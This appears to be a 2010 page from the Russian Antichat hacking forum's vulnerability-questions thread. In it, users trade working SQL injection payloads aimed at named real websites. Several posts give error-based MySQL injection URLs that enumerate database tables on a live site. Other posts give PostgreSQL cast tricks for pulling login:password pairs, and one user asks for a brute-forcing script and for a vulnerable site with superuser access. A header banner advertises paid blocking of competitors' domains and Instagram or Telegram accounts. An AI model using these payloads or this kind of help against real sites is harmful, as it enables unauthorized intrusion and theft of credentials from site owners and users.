Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1161 из 1393

1161

Опции темы

Поиск в этой теме

Опции просмотра

#11601

16.02.2010, 06:45

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

Отправить сообщение для LokbatanLi с помощью ICQ

Цитата:

Сообщение от Pashkela

Код:

http://www.bombardier.cv.ua/boat2.php?id_boat2=(select*from(select+name_const(version(),1),name_const(version(),1))a)

о4ень спасибо ну моjэт подробнее ??

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1

Последний раз редактировалось LokbatanLi; 16.02.2010 в 07:00..

#11602

16.02.2010, 08:10

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Цитата:

Сообщение от samarin

Как вывести информацию в виде login

asswd?

Например, так

Код:

select (login||chr(58)||passwd)::text::boolean from (select passwd,login from logins limit 1 offset 1)q;----

или так

Код:

select a::text::boolean from (select (login||chr(58)||passwd) as a from logins limit 1 offset 1)q;----

#11603

16.02.2010, 08:58

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Отправить сообщение для samarin с помощью ICQ

krypt3r
Спасибо! Вы как всегда на высоте

Spyder

Цитата:

Пробуй с подзапросами, тогда лимит должен работать
select (select table_name from information_schema.tables limit 1 offset 1)::text::boolean

Тоже спасибо! Это мы уже с krypt3r-ом разобрали.

Вот бы скриптик, для автоматического перебора оффсета, с авторизацией и https и я бы от всех отстал (можетбыть...)

И подкиньте сайтик, может у кого завалялся, с доступом к usesuper для образовательных целей

Последний раз редактировалось samarin; 16.02.2010 в 09:10..

#11604

17.02.2010, 18:26

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Отправить сообщение для CyberHunter с помощью ICQ

Помогите здесь скулю раскрутить:
http://zub.by/menu.php?form_id=1
Ввожу количество полей и всегда ошибка.

#11605

17.02.2010, 18:42

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Код:

http://zub.by/menu.php?form_id=(select*from(select+name_const(version(),1),name_const(version(),1))a)

#11606

17.02.2010, 18:57

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Pashkela У меня ошибка при таком вводе

А зависит ли это от браузера?

#11607

17.02.2010, 19:02

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит

Код:

http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)


http://zub.by/menu.php?form_id=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+1,1),1),name_const((select+table_name+from+information_schema.tables+limit+1,1),1))a)

.....

Последний раз редактировалось Pashkela; 17.02.2010 в 19:07..

#11608

17.02.2010, 19:14

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Цитата:

Правильно, ошибка, ты ошибку-то почитай
(5.0.51a-24)

PS: От версии браузера не зависит

У меня ничего подобного, вот смотри, что у меня:

Цитата:

# select parent_id, IF(id in (select menu_id from pl_user_settings),1,0) as access from pl_menu_menu where id = (select*from(select name_const(ve rsion(),1),name_const(version(),1))a)
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rsion(),1),name_const(version(),1))a)' at line 2

#11609

17.02.2010, 19:19

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Сообщение от CyberHunter

У меня ничего подобного, вот смотри, что у меня:

э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты

Сам подумай, откуда в url могут быть ПРОБЕЛЫ

#11610

17.02.2010, 19:21

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Цитата:

э, мен, ссылку когда отсюда копируешь, пробелы убирай, тут они специально расставляются, от таких как ты

Сам подумай, откуда в url могут быть ПРОБЕЛЫ

Об этом и хотел спросить

Страница 1161 из 1393

1161

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход